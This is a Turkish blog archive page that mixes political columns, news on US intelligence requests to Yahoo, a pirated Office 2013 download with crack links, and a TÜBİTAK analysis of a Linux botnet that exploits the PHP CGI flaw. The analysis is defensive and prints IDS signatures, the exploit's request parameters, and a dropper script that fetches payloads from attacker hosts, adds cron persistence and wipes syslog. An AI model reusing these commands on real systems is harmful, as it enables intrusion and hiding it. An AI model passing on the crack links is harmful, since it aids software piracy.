Günlük arşivler: Şubat 5, 2014

A. İklim Bayraktar : Can Dündar’a Cevap Vermek Geldi İçimden /// @aiklimbayraktar @06iklim @iklimb yrktr @iklimbayraktar

Bu aralar yaşam sahiden karanlık, düzen bozuk; her bilgi beyhude her çalışma nafile diyerek uzun zamandır yazı yazmak gelmiyordu içimden.

İçe sine, bağıra çağıra yazamıyorsak susmak iyidir diyordum, zaten nicedir yazdıklarım sustuklarımdan daha önemli ve değerli olmuyordu…

Bugün bir köşe yazısı okudum sosyal medyada ve cevap vermeden duramadım.

Sevgili Can Dündar, seni aydınlatmak haddim değil ama yazını okuyunca tecrübelerimi paylaşmaktan alıkoyamadım kendimi. Hem sen de merak içinde sıralamışsın sorularını yazında, sanırım bazılarının cevabını biliyorum…

Seni dinleyen arkadaşlarla beni dinleyenler aynı mı bilemem ama yaşadıklarım merakını biraz da olsa giderebilir diye düşünüyorum.

"İnsanın bu kadar içli dışlı olduğu biriyle hiç tanışmamış olması tuhaf…" demişsin ama emin ol tanışmak daha da tuhaf..!

Çünkü onlarla tanıştığında ya gözaltında ya da sorguda oluyorsun. İçinden geldiği gibi davrandığında o şartlarda bile polise mukavemetten hakkında ikinci bir dosya açıyorlar. İçinden geldiği gibi davranmayı kesip içine attığında kendi kendini kemiriyorsun.

“Arada kulağını çınlatıyoruz, selam yolluyoruz, duyuyor musun? Kızıyor musun?”demişsin ya; bak bu soruna net bir cevabım var; seni dinleyen arkadaşı bilmem ama beni dinleyenler ve sorgulayanlar çok genç, zıpkın gibi delikanlılardı ve kızmamışlardı. Hatta espri bile yaptı aralarından biri “arada bir bize de iyi saydırmışsınız İklim hanım” dedi. Yüzünde alaycı ama koca bir tebessümle… Sanırım eğleniyorlar dinlerken ya da dinledikleri insanı hiç ciddiye almadıkları için önemsemiyorlar.

"Her dinlediğini deşifre ediyor musun; yoksa kaydedip sonra kullanmak üzere mi saklıyorsun? Hiç silmiyor musun?" diye sormuşsun ya, bence her dinlediğini deşifre etmiyor amacına hizmet edecek olan konuşmaları deşifre ediyor.

Yine bire bir yaşadıklarımdan anlatayım: Öncelikle konuşmanın bir kısmını cımbızla çekip alıyor, diğer kısmı deşifreye koysa zaten suç unsuru ya da sanığı küçük düşürme eylemi çıkmayacak olduğundan deşifre ederken arada ….. şeklinde noktalar koyuyor.

Parantez açıyor (gülüşmeler) diyor kapıyor parantezi. Anlayacağın, seni kapana sıkıştıracağı kadar önemli bir konuda senin güldüğünü bile not düşüyor dinleme kayıtlarına.

İşine gelmeyen ve amacına hizmet etmeyenleri siliyor tabi. Silmese bile bir biçimde saklıyor. Aksi olsa; dinleme kayıtlarımın en önemli, en can alıcı olanını sırf kurulan kumpas tiyatrosuna uymayacağı ya da sanığın lehine olur düşüncesiyle, ortaya çıkarılmamasının başka bir mantıklı izahı olabilir mi?

Son yıllarda görülen flaş davalarının hepsinde sanıklar, iddianamelere konarak delil gösterilen "tape" denilen dinleme kayıtlarının, orijinal ses kayıtlarını mahkemelerden talep ettiler. Geldi mi orijinal konuşma kayıtları? Hayır gelmedi!

Herkesle her türlü konuşmamızı dinleyerek bizi bizden iyi tanıyan o arkadaşlar için:

"Yaptığın işten utanıyor musun? Hesap günü geldiğinde, yani bütün bu hukuksuzluk bitip devletin kirli arşivleri açıldığında, kaydediciler yargı önüne çıkarıldığında, belki tanışıp konuşabiliriz bunları da..." demişsin sevgili Can Dündar.

Yaptığı işten utanmasını beklemen beni şaşırttı. Utanmayı, vicdan duygusunu bilse her şeyin doğrusunu kendi kulaklarıyla duymasına rağmen sadece eğrileri raporlayanlardan bahsediyoruz.

Kaldı ki onlarla aramızda derin farklar var. Bir siyasi oluşuma, bir davaya ya da bir adanmışlığa mensupsan kendi vicdanın, kendi utanma duygunun bir önemi yoktur. Sadece ait olduğun, ölümüne sevgi, saygı belki bir miktar korkuyla bağlandığın yerlerin istek ve doğruları vardır.

Ve şimdilerde insanların hayatını karartan bu vahim davalarla top gibi oynuyorlar. Hepsi topu elinden çkarmaya çalışıyor.

İşte bu yüzden de asla hayalini kurduğun gibi: "Belki toplu imhadan önce isteyenlere kendi dosyalarını alıp inceleme, istediği kayıtları dinleme şansı verilir; eski günlerin kayıtlarını dinleyip güleriz biz de... " şeklinde bir son bekleme, çünkü olmayacak.

O kayıtlar çoktan yok edilmiştir bile. Bırak dinleyerek gülmeyi, gerçeği ispatlayıp derin bir oh çekme şansımız ve hakkımız bile olmayacak…

TEKNOLOJİ : PHOTOSHOP İLE 2 DAKİKADA İNANILMAZ DEĞİŞİM /// MUTLAKA İZLEYİN ///

VİDEOYU GÖRMEK İÇİN BURAYA TIKLAYIN.

PROGRAM TAVSİYESİ : Microsoft Office 2013 Türkçe – Full /// Mutl aka olması gereken bir program ///

sUIsb6b.png

Office 2013 Türkçe normal kurulumlu

Microsoft Office 2013 Professional Plus

Microsoft Access
Microsoft Excel
Microsoft InfoPath
Microsoft Lync
Microsoft OneNote
Microsoft Outlook
Microsoft PowerPoint
Microsoft Publisher

Microsoft SkyDrive Pro
Microsoft Visio Viewer
Microsoft Word
Office Shared Features
Office Tools

Not: Winrarın içindeki dosya iso kalıbıdır. Eğer iso kalıbı nedir bilmeyen varsa, dosyayı winrardan çıkardıktan sonra üzerinde sağ klik yapıp klasöre çıkar seçeneği ile normal bir şekilde klasöre çıkarıp kuruluma başlayabilir.

İndirme linki

32.bit http://turbobit.net/28asvj0hvgri.html

64.bit http://turbobit.net/rn64moawqaur.html

ilaç: http://turbobit.net/46597s98mawa.html

Diğer indirme linki

32 Bit 201332BitTR.rar (606,56 MB) – uploaded.net

64 Bit 201364BitTR.rar (699,97 MB) – uploaded.net

Crack McrsftTlkt2013.rar (35,70 MB) – uploaded.net

Diğer indirme linki

32 Bit 201332BitTR.rar download for free on file share letitbit.net

64 Bit 201364BitTR.rar download for free on file share letitbit.net

Crack McrsftTlkt2013.rar download for free on file share letitbit.net

DİNİ BİLGİLER : Hayat-üs Sahabe – Sahabilerin Hayatı – Sesli – T ek Link –

v376.jpg

Peygamber efendimizin(SAV) sahabelerinin hayatlarının anlatıldığı 21 CD’lik dev bir arşiv, mp3 formatında.

İster bilgisayarınızdan ister cep telefonunuzdan dinleyebilirsiniz.

Kesinlikle her müslümanın bilgisayar,cep telefonu vb araçlarında bulunması gereken bir kaynaktır.

Peygamber Efendimize iman ederek O’nu gören ve müslüman olarak ölen kimseler.

Lügat itibariyle ashab, arkadaş manasına gelen "sâhib" kelimesinin çoğuludur. İslâm ıstılâhında "Hz. Peygamber’in arkadaşları" için, daha geniş kapsamıyla Rasulullah’ı gören müminler için kullanılmıştır. Sahabî ve çoğulu olan sahabe terimleri de aynı manayı ifade eder. Peygamberi dünya gözüyle görmek şarttır. O’nu (s.a.s.) rüyasında görenler sahabi sayılmaz.
Hz. Peygamber (s.a.s.)’i kendisine peygamberlik gelmeden önce gören veya O’nunla sohbet eden, fakat peygamberlikten sonra göremeyen kişi de sahabî sayılmaz.

>>> Programı indirmek için Tıklayınız <<<

PC ÇÖZÜMLERİ : Linux Botnet ve PHP CGI Açıklığı

Necati Ersen ŞİŞECİ, Abdurrahman PEKTAŞ, TÜBİTAK BİLGEM
Zaman zaman sistemler üzerinde çalışan servislerde uzaktan komut çalıştırma zafiyetleri tespit edilmektedir. Tespit edilen zafiyetler, saldırganlar tarafından istismar edilerek, hedef sistemlere uzaktan erişim sağlanmaktadır. Bu zafiyetlerinbir kısmı Linux sistemlerde bulunmaktadır.

Günümüzde, uzaktan komut çalıştırma zafiyetinin kullanarak binlerce bilgisayara bulaşan zararlı yazılımlar mevcuttur. Saldırgan, zararlı yazılımların bulaştıkları makineleri uzaktan HTTP, IRC gibi protokoller aracılığı ile yönetir. Bu şekilde binlerce bilgisayarın bir araya gelmesine botnet denir.Medyada sık sık rastladığımız DDoS saldırıları, botnetler aracılığı ile yapılmaktadır.

Ağ trafiğindeki zaralı aktiviteleri tespit etmek için Saldırı Tespit Sistemleri (Intrusion Detection System, IDS) kullanılır.

Test için kurduğumuz bir IDS’in kayıtlarını incelerken Emerging Threats’e ait bir IDS imzası dikkatimizi çekti. IDS alarmının detaylarına baktığımızda PHP CGI açıklığını kullanan bir saldırı olduğunu tespit ettik. Test için kurduğumuz diğer birkaç sisteme baktığımızda bu saldırının Aralık ayından beri yapılmakta olduğunu tespit ettik.

Yaptığımız araştırmalar sonucu bu açıklık ve yayılma şekli ile ilgili elde ettiğimiz tüm bilgileri aşağıda bulabilirsiniz.

Saldırının Tespiti

Şekil 1’ bu IDS alarmına ait detaylı bilgileri görebilirsiniz.

Şekil 1 IDS Alarmı

Emerging Threats tarafından yayınlanan imza aşağıdadır. Bu imza Mart 2013’de yayınlanmıştır.

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER WebShell Generic – wget http – POST"; flow:established,to_server; content:"wget"; nocase; http_client_body; content:"http"; nocase; http_client_body; within:11; classtype:bad-unknown; sid:2016683; rev:2;)

Saldırının Analizi

Yapılan saldırı daha önce yayınlanan bir PHP istismar kodunun biraz değiştirilmiş halini kullanmaktadır.

POST İsteği

Yapılan saldırıda aşağıdaki C kodunda bulanan "poststr" değişkeninin içeriği POST isteği olarak gönderilmektedir.

char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"

………………..

"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn"

"Host: %srn"

"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26"

"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn"

"Content-Type: application/x-www-form-urlencodedrn"

"Content-Length: %drn"

"Connection: closernrn%s";

Exploit kodunda verilen ve saldırgan tarafından kullanılan POST işleminde,

  • /cgi-bin/php
  • /cgi-bin/php4
  • /cgi-bin/php5
  • /cgi-bin/php.cgi
  • /cgi-bin/php-cgi

Yazılımlarına aşağıdaki parametreler gönderilmektedir.

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n?

POST Verisi

Yapılan POST isteğinin veri kısmında ise hxxp://221.132.37.26/sh adresindeki betiğin hedef sisteme, wget ile indiren ve çalıştıran bir kodu olduğu gözlemlenmiştir. Şekil 1’de bu istek görülebilir.

İlk İndirilen “sh” Betiği

İlgili adresten indirilen betiğin içeriği aşağıda verilmiştir.

#!/bin/sh

cd /tmp;cd /dev/shm

wget -q hxxp://221.132.37.26/shc -O ..a

chmod +x ..a

./..a

cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru

cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr

killall -9 .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w php

killall -9 .rnd

killall -9 .a

killall -9 kernelupdate

killall -9 dev

killall -9 sh

killall -9 bash

killall -9 apache2

killall -9 httpd

killall -9 cla

killall -9 ka

killall -9 kav

killall -9 m32

killall -9 m64

killall -9 perl

killall -9 sh

killall -9 sucrack

kill -9 `pidof .rnd`

kill -9 `pidof .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w`

kill -9 `pidof dev`

kill -9 `pidof perl`

kill -9 `pidof m32`

kill -9 `pidof m64`

kill -9 `pidof ka`

kill -9 `pidof kav`

kill -9 `pidof cla`

kill -9 `pidof sh`

kill -9 `pidof sucrack`

echo "@weekly wget -q hxxp://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron

crontab /tmp/cron

rm -rf /tmp/cron

Yukarıdaki betiğin içerisinden de anlaşıldığı üzere, /dev/shm dizini altına hxxp://221.132.37.26/shc adresinden indirdiği dosyayı “..a” ismiyle kaydedip çalıştırmaktadır.

Bu işlemden sonra internetten 2 farklı dosya indirmekte bunları çalıştırmakta daha sonra bu dosyaları silmektedir. Bu işlemden sonra ise, sistemdeki saldırgan tarafından oluşturulduğu düşünülen bazı süreçleri sonlandırmaktadır.
Betiğin son 3 satırında ise, kendisini sistemin crontab’ına ekleyen satırlar bulunmakta olup, zararlı kod kendisini haftalık olarak güncellemekte ve tekrar çalıştırmaktadır.

echo "@weekly wget -q hxxp://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron

crontab /tmp/cron

rm -rf /tmp/cron

“shc” IRC İstemcisi

İnternet’ten indirilen ilk dosya olan “shc” ikili bir dosyadır. Çalıştırıldıktan sonra aşağıdaki sistem komutlarını çalıştırmaktadır.

rm –f /var/log/syslog; touch /var/log/syslog;chmod 0000 /var/log/syslog; chattr –isa /var/log/syslog

Bu işlemler /var/log/syslog dosyası silinip yeni bir dosya oluşturuluyor ve dosyanın özellikleri sadece eklenebilir, silinemez, taşınamaz gibi değiştiriliyor.

Not: Bu işlem zararlı yazılım root hakları ile çalıştırıldığı zaman yapılabilmektedir. Sistemde bulunan apache, nobody gibi kullanıcılar bu işlemi gerçekleştiremez.

Bu proses çalıştırıldıktan sonra fork() fonksiyonunu kullanarak yeni bir child process açıyor ve ismini “-bash” olarak değiştiriyor.
Bu işlemden sonra 200.20.10.72 IP adresinde çalışan IRC sunucuya bağlanmakta ve “#irc” kanalına girmektedir. Bu kanalda ise, zararlı yazılımın sahibinin gönderdiği bilgileri çalıştırmaktadır.

IRC kanalına girip “#irc” kanalına girdiğimizde kanal listesinin kapalı olduğunu farkettik. Ancak bir süre sonra özel mesaj ile aşağıda belirtilen içerikli mesaj geldi.

cd /dev/shm ; wget 221.132.37.26/ru.php ; bash ru.php ; rm -rf ru.php

Bu mesajda gönderilen ru.php, sh isimli betiğin içerisinde ru olarak geçmektedir. Ancak ru ve ru.php dosyalarının içeriği aynıdır.

Bu mesajı gönderen kullanıcıya aynı formatta birkaç komut gönderdiğimizde aşağıdaki çıktıyı aldık.

Şekil 2 IRC Komutları

IRC kanalındaki kullanıcı listesi kapalı olduğundan dolayı, kaç istemcinin IRC kanalında olduğunu tespit edilememiştir.
Zararlı yazılımın IRC kanalı aracılığı ile aldığı bazı komutlar Şekil 3’de gösterilmiştir.

Şekil 3 Bazı IRC Komutları

Zararlı yazılım tekrar çalışma ihtimaline karşı “/tmp/.x” isimli dosyayı oluşturmakta ve bu dosya olmadığı zaman IRC kanalına bağlanmaktadır.

"shc" zararlı yazılımının Virüs Mü tarama sonuçları aşağıdadır.

Şekil 4 Virüs Mü tarama sonuçları

ru.php (ru) Betiği

“sh” isimli betik, yukarıdaki IRC istemcisini çalıştırdıktan sonra 2 dosya daha indirmektedir.

root@test:/home/test/php-cgi# cat ru.php

#!/bin/bash

dontrun=""

arch=`uname -m`

cd /dev/shm

function runPnscan()

{

cd /dev/shm

chmod +x pnscan php

bash run &

}

function isPnscanOn()

{

pid=`pidof pnscan`

if [ "$pid" == "" ];then

retval=0

else

retval=1

fi

echo "$retval"

}

cd /dev/shm

if [ ! -f pnscan ];then

case "$arch" in

"x86_64")

wget -q hxxp://korivind.se/64.tgz -O 64.tgz

tar xvzf 64.tgz

rm -rf 64.tgz

;;

*)

wget -q hxxp://korivind.se/86.tgz -O 86.tgz

tar xvzf 86.tgz

rm -rf 86.tgz

;;

esac

fi

if [ $(isPnscanOn) == 1 ];then

# echo "Running"

exit

else

echo "Not Running"

if [ "$dontrun" != "1" ];then

$(runPnscan)

fi

fi

rm -rf /dev/shm/run

rm -rf /dev/shm/pnscan

Bu betik belirtilen adresten, işletim sisteminin 32 bit veya 64 bit olmasına göre farklı bir sıkıştırılmış dosya indirmektedir. Indirilen dosya /dev/shm dizini altına indirilip, açıldıktan sonra “run” isimli betik çalıştırılmaktadır.

Sıkıştırılmış dosyanın içerisinde 3 farklı dosya bulunmaktadır. Bu dosyalar aşağıda özetlenmiştir.

run

Sıkıştırılmış 86.tgz dosyasının içerisinde yer alan “run” betiğinin içeriği aşağıdadır.

root@test:/home/test/php-cgi/86# cat run

#!/bin/bash

rand=`echo $((RANDOM%225+2))`

cd /dev/shm

nohup ./pnscan -rApache -w"HEAD / HTTP/1.0rnrn" $rand.0.0.0/8 80 > /dev/null &

Bu betik, 2-226 aralığında rastgele bir sayı üretmekte ve /dev/shm dizini altında bulunan pnscan yazılımı aracılığı ile bu IP aralığını taramaktadır.

pnscan

pnscan, kaynak kodları internetten temin edilebilecek, açık kaynak bir port tarama yazılımıdır. Saldırgan bu yazılımın kaynak kodlarını alıp üzerinde değişiklik yaparak kendi ihtiyacına göre güncellemiştir.

root@test:/home/test/php-cgi/86# ./pnscan -h

Usage: ./pnscan [<options>] [{<CIDR>|<host-range> <port-range>} | <service>]

This program implements a multithreaded TCP port scanner.

More information may be found at:

http://www.lysator.liu.se/~pen/pnscan

Command line options:

-h Display this information.

-V Print version.

-v Be verbose.

-d Print debugging info.

-s Lookup and print hostnames.

-i Ignore case when scanning responses.

-S Enable shutdown mode.

-l Line oriented output.

-w Request string to send.

-W Hex coded request string to send.

-r Response string to look for.

-R Hex coded response string to look for.

-L Max bytes to print.

-t Connect/Write/Read timeout.

-n Concurrent worker threads limit.

Saldırgan tarafından çalıştırılan pnscan komutu aşağıdaki gibi çalıştırılmaktadır.

nohup ./pnscan -rApache -w"HEAD / HTTP/1.0rnrn" $rand.0.0.0/8 80 > /dev/null &

Saldırgan, A sınıfı bir IP bloğunu taramakta ve tüm IP adreslerinin 80 portuna “–w” parametresi ile “HEAD /HTTP/1.0rnrn” isteğini göndermektedir. Gönderilen isteğe gelen cevapta “-r” parametresi ile “Apache” kelimesi aranmaktadır. Bulunması durumunda bu sitede istismar kodunun denenmesi için saldırgan tarafından değiştirilmiş olan PHP istismar kodunu çalıştıran “php” isimli ikili dosya çalıştırılmaktadır. “php” ikili dosyası aşağıdaki parametrelerle çalıştırılmaktadır.

./php –target TARGET_IP –port 80 –protocol http –reverse-ip 12.8.8.8 –reverse-port 80

php

php isimli ikili dosya, yayınlanmış olan istismar kodunun saldırgan tarafından değiştirilmiş bir POST verisi içermektedir. Yayınlanış olan istimar kodunda, ters bağlantı yapabilen bir kod bulunmaktadır. Burada kullanılan istismar isteğinde, ters bağlantı açan kod yerine uzaktan bir kabuk betiği indirip, çalıştıran bir POST verisi kullanılmıştır. Gönderilen POST verisi, şekil 1 de görülmektedir.

Saldırı Kaynakları

10 gün kadar çalışan test saldırı tespit sistemimizin kayıtlarında, toplamda 70 adet farklı IP tespit edildi. Coğrafi dağılımlar aşağıdaki şekilde gösterilmiştir.

Şekil 5 STS alarmlarının coğrafi dağılımı

Saldırı Tespit Sistemi İmzası

Yukarıda bahsedilen STS imzası yapılan HTTP isteiğinde "wget" kelimesini aramaktadır. Bu sebeple daha önce yayınlanmış olan istismar kodu için çalışmayacaktır. Geliştirilen STS imzası aşağıdadır.

alert tcp any any -> $HOME_NET $HTTP_PORTS (msg:"PHP CGI REMOTE CODE EXECUTION ATTEMPT"; flow:established, to_server; content: "POST"; http_method; uricontent:"php://input"; sid:2000021;)

Kontrol ve Temizlenmesi

Zararlı yazılım kendisini PHP’nin açıklığını kullanarak diğer sistemlere bağlanmakta, daha sonra bir IRC kanalına bağlanmakta ve rastgele bir A sınıfı IP bloğunu taramaktadır. Ağ trafiğinin izlenmesi, güvenlik duvarının kayıtları ve sistemdeki bazı izler aracılığı ile tespit edilip, temizlenebilir.

Kontrol

Zararlı yazılım kendisini “/dev/shm” dizini altına atmaktadır. Bu dizinin kontrol edilmesi gerekmektedir. Saldırgan tarafından ismi “.” ile başlayan bazı dosyalar kullanılmaktadır. Linux ve Unix tipi işletim sistemleri için “.” Özel anlam ifade ettiği için “ls” komutu ile dizin kontrol edilirken mutlaka “-a” parametresi kullanılmalıdır.

pnscan zararlı yazılımı, /var/log/syslog dosyasının izinlerini ve çeşitli özelliklerini değiştirmektedir.

Şekil 6 syslog dosyası izin ve özellikleri

Ağ akış kayıtlarından uzun süreli bağlantıların varlığı kontrol edilmelidir.
/tmp/.x” isimli dosyanın varlığı, sistemde “shc” zararlı yazılımının varlığını gösteriyor olabilir.

Güvenlik duvarı kayıtlarından, IRC sunucusuna ve diğer adreslere giden bağlantı olup olmadığı kontrol edilmelidir.

Temizlik

  • /dev/shm dizini altı kontrol edilmeli ve şüpheli dosya varsa silinmelidir.
  • apache, nobody gibi Apache web sunucu yazılımını çalıştıran kullanıcının crontab’ı kontrol edilmelidir.
  • Sistemde bulunan PHP yazılımı mutlaka güncellenmelidir.

Önemli Not

Bu çalışma kapsamında, “shc”, “pnscan” ve “php” isimli ikili dosyalarına kısıtlı bir miktar davranışsal analiz ve statik analiz yapılmıştır. Bu sebeple, zararlı yazılımların tüm işlevleri tespit edilememiş olabilir.

Saldırgan tarafından IRC bağlantısı aracılığı ile veya crontab’dan haftalık yapılan güncellemelerle sisteme çeşitli arka kapılar, ek yazılımlar yerleştirilmiş, yeni servisler veya kullanıcılar açılmış, sistemin ayarlarında değişiklik yapmış olabilir. Bu sebeple sistemin tamamı gözden geçirilmelidir.

Saldırılarda kullanılan HTTP adresleri, yanlışlıkla tıklanılmaması amacı ile yazı içerisin HXXP olarak yazılmıştır.

FETULLAH GÜLEN DOSYASI /// EMİN PAZARCI : Cemaatin vicdanı var mı ?

EMİN PAZARCI / emin.pazarci

Yıllar önceydi. O günlerde "Ergenekon Terör Örgütü" tartışılıyordu. Herkes Ergenekon’a yükleniyor, yerden yere vuruyordu. Ben ise, olaya farklı bakıyordum. Birkaç televizyon programında Ergenekon için "Doğrularla yanlışların karışımı" demiştim.

O dönemde pek çok insan yüzünü buruşturdu.

Benim görüşüm ise hiç değişmedi. Hatta daha da ileri gidip, ortada bir "çeteler savaşı" bulunduğu yorumunu bile yaptım.

Sonuç:

Çalıştığım gazete cemaat yanlılarının eline geçtiği için kovuldum. Evet, "ekonomik gerekçeler" bahane edilerek resmen kovuldum! Çünkü, onlar henüz dava başlamadan, iddianame bile okunmadan kararlarını vermişlerdi:

– Bunlar en ağır cezalara çarptırılmalı.

O yüzden, bugün yaptığım eleştiriler ve tespitler için "Daha önce neredeydiniz?" diyenlere gülüyorum.

***

Şimdi geçmişe dönüp baktığımda haklı çıktığımı görüyorum. Baksanıza, iddianın bini bir para! Paralel Devlet Yapılanması’nın dava sürecinde pek çok hukuksuzluğa imza attığına, kumpaslar kurduğuna dair isnatlar havada uçuşuyor.

Bunlardan daha da önemlisi, 2008 ve 2011 yılları arasında Ergenekon Mahkemesi’nin Başkanlığını yapan Köksal Şengün’ün söyledikleri…

Diyor ki:

– İddianameleri tam okumadan kabul ettik. Şimdi olsa geri çevirirdim.

Ardından ekliyor:

– Dijital deliller ve gizli tanık ifadeleri araştırılmadı.

Şengün, CD’ler başta olmak üzere delillerin tam olarak "incelenmediğini", Şemdin Sakık dahil gizli tanıkların ifadelerini "sakat bulduğunu" söylüyor. Daha da ileri gidip şu ifadeyi kullanıyor:

– Sıkıyönetim mahkemelerinde hakimler daha demokrattı.

Şimdi, elbette "Madem öyleydi, neden daha önce bunlar söylenmedi?" denilebilir. Vicdanlar sorgulanıp "İnsanların hayatı bu kadar ucuz mu?" değerlendirmesi yapılabilir. Başka bir takım argümanlarla ortaya çıkılabilir. Vesaire, vesaire…

Bunlar ayrı tartışma konuları.

Olaya hukuki olarak baktığımızda ise, ortada çok farklı bir tablo var. Bütün bu gelişmeler, Ergenekon’da yeniden yargılamanın önünü açabilir.

***

Biliyorsunuz, tutukluluk süresinin 5 yıla indirilmesi çalışmaları sürüyor. Yakında sonuçlanacak.

Toplumun çeşitli çevreleri tarafından genellikle olumlu karşılanıyor. Cemaat ise farklı telden çalıyor. Dün cemaatin amiral gemisi olan gazetede bir haber vardı…

"Tutukluluk süresi 5 yıla inerse, Ergenekon sanıklarına tahliye yolu gözüküyor" başlığını taşıyordu. İçinde de şöyle bir yorum yer alıyordu:

"Yargıtay kararı ile kesinleşmese bile sanıklar mahkûm oldu. Hukukçular, bu konuda yasada şerh düşülmezse kaos çıkabileceği uyarısında bulunuyor."

Şimdi ne demek bu?

"Aman ha Ergenekon sanıklarını bırakmayın, bu düzenlemenin dışında tutun" demek!

Garip değil mi?

Türkiye’de bir takım gelişmeler ortaya çıkıyor. Davaya bakan hakimler bile yargılama sırasında bazı sakatlıklar yapıldığı iddialarını dile getiriyor…

Ama, Türkiye’deki bir yapı, ısrarla direnmeye devam ediyor. Bu ülkede herkese tanınan bir haktan, eşit durumdaki bazı insanların yararlanmaması için çırpınıp duruyor.

Birincisi, bu insani değil.

İkincisi hukuki değil.

Üçüncüsü de İslami değil.

Bu, vicdanı olan hiç kimsenin kabul edemeyeceği bir davranış şekli!

Ama göz göre göre, göstere göstere açıktan yapılıyor. Daha da garibi, hemen ardından "hak, hukuk ve adalet" nutukları atılıyor.

Bu işte çok ciddi bir sakatlık var!

***

Türkiye’de garip işler oluyor! Aklı, fikri ve vicdanı olan hiç kimsenin kabul edemeyeceği gelişmeler yaşanıyor.

Artık herkesin bunu görmesi lazım. Bu toplumun bütün değerleri istismar edilip, paspas gibi çiğneniyor. Hepsinin ticareti yapılıyor. Farkında mısınız?

TEKNİK TAKİP : ABD’de internet şirketlerine istihbarat baskısı

Yahoo Amerikan istihbaratının kullanıcı bilgilerine ulaşmak için altı aylık sürede yaptığı taleplere açıklık getirdi. Şirketin 40 bine yakın kullanıcı hesabından şahsi bilgi alınmak istendiği ortaya çıktı.

ABD’de NSA (Ulusal Güvenlik Dairesi) ve FBI’ın (Federal Soruşturma Bürosu) teknoloji şirketlerine kullanıcılarının şahsi bilgilerini açıklamaları için yaptığı talepler konusunda ortaya yeni ayrıntılar çıktı.

2013’ün ilk altı ayı süresince Yahoo’dan 30 bin ila 40 bin arasında kullanıcı hesabının içeriğini teslim etmesinin istendiği bildiriliyor.

Benzer taleplerle karşılaşan Microsoft, Facebook, LinkedIn ve Google’ın da içinde bulunduğu bilişim devleri arasında Amerikan istihbaratının en yoğun biçimde Yahoo’ya yöneldiği anlaşılıyor.

Yahoo, istihbarat yetkililerinin e-postalarda hangi kelimelerin kullanıldığına, anında mesajlaşma servisinde yazılanlara, Yahoo’ya bağlı Flickr sitesine konan fotoğraflara ve Yahoo’nun rehber ya da takvim hizmetlerindeki şahsi bilgilere ulaşmak istediğini açıkladı.

Ne kadar şeffaf?

Yahoo ayrıca blog sitesi Tumblr hakkında yayımladığı şeffaflık raporunda sitenin kullanıcılarının özel hayatına müdahale eden türden bir taleple karşılaşılmadığı kaydetti.

Amerikan yasaları, güvenlik servisinin istihbarat toplamak amacıyla bu gibi taleplerde bulunmasına izin veriyor.

Teknoloji şirketleri yayınladıkları şeffaflık raporlarıyla Amerikan istihbaratıyla aralarındaki işbirliğinin boyutunu gözler önüne sererek tüketicilere güvence vermeyi amaçlıyor.

Ancak kimi şirketler, istihbarat taleplerini daha ayrıntılı biçimde kamuoyuna duyurma hakkı talep ediyor.

Örneğin teknoloji şirketlerinin kamuoyuyla paylaştığı rakamsal bilgiler, talep sayısını değil kaç tane kullanıcı hesabının etkilendiğini gösteriyor. Fakat bir kullanıcı hesabı hakkında çok sayıda istihbarat talebi olabileceği için bu sayının da kamuoyuna duyurulması isteniyor.

İngiliz-Amerikan işbirliği

Google’ın hukuki işlerden sorumlu yöneticisi Richard Salgado, ”İstihbarat taleplerinin tam sayısı ve ne tipte olduğuna dair daha kesin bilgileri kamuoyuna açıklamak istiyoruz” dedi.

Özel hayatın mahremiyetini korumak için kampanya yürüten Privacy International adlı örgütten Mike Rispoli BBC’ye verdiği mülakatta, şeffaflık raporlarının artık fazla bir şey ifade etmediğini çünkü günümüzde hükümetlerin veri toplamak için teknoloji şirketlerinin kapısını çalmaktansa arka kapıdan gizlice sızmayı yeğlediğini söyledi.

Eski Amerikalı istihbaratçı Edward Snowden’ın basına sızdırdığı ve Washington Post gazetesinde yayımlanan gizli belgelere göre Amerikan Ulusal Güvenlik Dairesi NSA ve İngiltere’deki müdahili GCHQ, Google ve Yahoo’nun veri merkezleri arasındaki iletişim bağlantılarına gizlice sızarak bilgiler kaydetti.

Buna ilaveten Guardian gazetesinin yayımladığı belgeler ise GCHQ’daki İngiliz casusların fiber optik internet kablolarından veri toplayarak bu bilgiyi Tempora adlı operasyon çerçevesinde Amerikalı istihbaratçılarla paylaştığına işaret ediyor.

YÜKSEK STRATEJİ TÜRKİYE

strateji, istihbarat, güvenlik, politika, jeo-politik, mizah, terör, araştırma, teknoloji

%d blogcu bunu beğendi: